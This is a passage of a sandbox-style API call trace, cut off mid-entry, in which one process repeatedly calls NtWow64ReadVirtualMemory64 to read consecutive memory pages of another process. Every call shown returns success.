0x0 [0130.822] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b14000, Buffer=0x7ffb, BufferSize=0xaa4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.822] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b15000, Buffer=0x7ffb, BufferSize=0xaa5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b16000, Buffer=0x7ffb, BufferSize=0xaa6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b17000, Buffer=0x7ffb, BufferSize=0xaa7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.823] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b18000, Buffer=0x7ffb, BufferSize=0xaa8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b19000, Buffer=0x7ffb, BufferSize=0xaa9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1a000, Buffer=0x7ffb, BufferSize=0xaaa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.824] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1b000, Buffer=0x7ffb, BufferSize=0xaab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.825] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1c000, Buffer=0x7ffb, BufferSize=0xaac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.825] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1d000, Buffer=0x7ffb, BufferSize=0xaad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.825] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1e000, Buffer=0x7ffb, BufferSize=0xaae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.825] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1f000, Buffer=0x7ffb, BufferSize=0xaaf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.826] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b20000, Buffer=0x7ffb, BufferSize=0xab0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.826] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b21000, Buffer=0x7ffb, BufferSize=0xab1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.826] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b22000, Buffer=0x7ffb, BufferSize=0xab2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.826] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b23000, Buffer=0x7ffb, BufferSize=0xab3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b24000, Buffer=0x7ffb, BufferSize=0xab4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b25000, Buffer=0x7ffb, BufferSize=0xab5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b26000, Buffer=0x7ffb, BufferSize=0xab6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.827] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b27000, Buffer=0x7ffb, BufferSize=0xab7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b28000, Buffer=0x7ffb, BufferSize=0xab8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b29000, Buffer=0x7ffb, BufferSize=0xab9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2a000, Buffer=0x7ffb, BufferSize=0xaba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.828] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2b000, Buffer=0x7ffb, BufferSize=0xabb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2c000, Buffer=0x7ffb, BufferSize=0xabc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2d000, Buffer=0x7ffb, BufferSize=0xabd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2e000, Buffer=0x7ffb, BufferSize=0xabe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2f000, Buffer=0x7ffb, BufferSize=0xabf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.829] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b30000, Buffer=0x7ffb, BufferSize=0xac0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b31000, Buffer=0x7ffb, BufferSize=0xac1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b32000, Buffer=0x7ffb, BufferSize=0xac2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b33000, Buffer=0x7ffb, BufferSize=0xac3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b34000, Buffer=0x7ffb, BufferSize=0xac4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.830] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b35000, Buffer=0x7ffb, BufferSize=0xac5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b36000, Buffer=0x7ffb, BufferSize=0xac6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b37000, Buffer=0x7ffb, BufferSize=0xac7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b38000, Buffer=0x7ffb, BufferSize=0xac8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b39000, Buffer=0x7ffb, BufferSize=0xac9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3a000, Buffer=0x7ffb, BufferSize=0xaca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3b000, Buffer=0x7ffb, BufferSize=0xacb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3c000, Buffer=0x7ffb, BufferSize=0xacc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3d000, Buffer=0x7ffb, BufferSize=0xacd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3e000, Buffer=0x7ffb, BufferSize=0xace000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b3f000, Buffer=0x7ffb, BufferSize=0xacf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b40000, Buffer=0x7ffb, BufferSize=0xad0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b41000, Buffer=0x7ffb, BufferSize=0xad1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b42000, Buffer=0x7ffb, BufferSize=0xad2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b43000, Buffer=0x7ffb, BufferSize=0xad3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b44000, Buffer=0x7ffb, BufferSize=0xad4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b45000, Buffer=0x7ffb, BufferSize=0xad5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b46000, Buffer=0x7ffb, BufferSize=0xad6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b47000, Buffer=0x7ffb, BufferSize=0xad7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b48000, Buffer=0x7ffb, BufferSize=0xad8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b49000, Buffer=0x7ffb, BufferSize=0xad9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4a000, Buffer=0x7ffb, BufferSize=0xada000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4b000, Buffer=0x7ffb, BufferSize=0xadb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4c000, Buffer=0x7ffb, BufferSize=0xadc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4d000, Buffer=0x7ffb, BufferSize=0xadd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4e000, Buffer=0x7ffb, BufferSize=0xade000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b4f000, Buffer=0x7ffb, BufferSize=0xadf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b50000, Buffer=0x7ffb, BufferSize=0xae0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b51000, Buffer=0x7ffb, BufferSize=0xae1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b52000, Buffer=0x7ffb, BufferSize=0xae2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b53000, Buffer=0x7ffb, BufferSize=0xae3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b54000, Buffer=0x7ffb, BufferSize=0xae4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b55000, Buffer=0x7ffb, BufferSize=0xae5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b56000, Buffer=0x7ffb, BufferSize=0xae6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b57000, Buffer=0x7ffb, BufferSize=0xae7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b58000, Buffer=0x7ffb, BufferSize=0xae8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b59000, Buffer=0x7ffb, BufferSize=0xae9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5a000, Buffer=0x7ffb, BufferSize=0xaea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5b000, Buffer=0x7ffb, BufferSize=0xaeb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5c000, Buffer=0x7ffb, BufferSize=0xaec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5d000, Buffer=0x7ffb, BufferSize=0xaed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5e000, Buffer=0x7ffb, BufferSize=0xaee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b5f000, Buffer=0x7ffb, BufferSize=0xaef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b60000, Buffer=0x7ffb, BufferSize=0xaf0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b61000, Buffer=0x7ffb, BufferSize=0xaf1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b62000, Buffer=0x7ffb, BufferSize=0xaf2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b63000, Buffer=0x7ffb, BufferSize=0xaf3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b64000, Buffer=0x7ffb, BufferSize=0xaf4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b65000, Buffer=0x7ffb, BufferSize=0xaf5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b66000, Buffer=0x7ffb, BufferSize=0xaf6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b67000, Buffer=0x7ffb, BufferSize=0xaf7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b68000, Buffer=0x7ffb, BufferSize=0xaf8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.849] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b69000, Buffer=0x7ffb, BufferSize=0xaf9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.849] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6a000, Buffer=0x7ffb, BufferSize=0xafa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.849] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6b000, Buffer=0x7ffb, BufferSize=0xafb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6c000, Buffer=0x7ffb, BufferSize=0xafc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6d000, Buffer=0x7ffb, BufferSize=0xafd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6e000, Buffer=0x7ffb, BufferSize=0xafe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6f000, Buffer=0x7ffb, BufferSize=0xaff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.850] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b70000, Buffer=0x7ffb, BufferSize=0xb00000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.851] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b71000, Buffer=0x7ffb, BufferSize=0xb01000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.851] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b72000, Buffer=0x7ffb, BufferSize=0xb02000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.934] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b73000, Buffer=0x7ffb, BufferSize=0xb03000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.935] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b74000, Buffer=0x7ffb, BufferSize=0xb04000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.935] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b75000, Buffer=0x7ffb, BufferSize=0xb05000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.935] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b76000, Buffer=0x7ffb, BufferSize=0xb06000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.935] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b77000, Buffer=0x7ffb, BufferSize=0xb07000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.936] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b78000, Buffer=0x7ffb, BufferSize=0xb08000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.936] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b79000, Buffer=0x7ffb, BufferSize=0xb09000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.936] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7a000, Buffer=0x7ffb, BufferSize=0xb0a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.936] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7b000, Buffer=0x7ffb, BufferSize=0xb0b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.936] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7c000, Buffer=0x7ffb, BufferSize=0xb0c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.937] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7d000, Buffer=0x7ffb, BufferSize=0xb0d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.937] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7e000, Buffer=0x7ffb, BufferSize=0xb0e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.937] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7f000, Buffer=0x7ffb, BufferSize=0xb0f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.937] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b80000, Buffer=0x7ffb, BufferSize=0xb10000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.938] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b81000, Buffer=0x7ffb, BufferSize=0xb11000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.938] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b82000, Buffer=0x7ffb, BufferSize=0xb12000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.938] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b83000, Buffer=0x7ffb, BufferSize=0xb13000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.938] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b84000, Buffer=0x7ffb, BufferSize=0xb14000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.938] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b85000, Buffer=0x7ffb, BufferSize=0xb15000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 